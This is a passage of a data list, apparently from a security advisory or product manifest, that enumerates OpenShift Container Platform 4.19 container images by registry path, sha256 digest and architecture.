"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
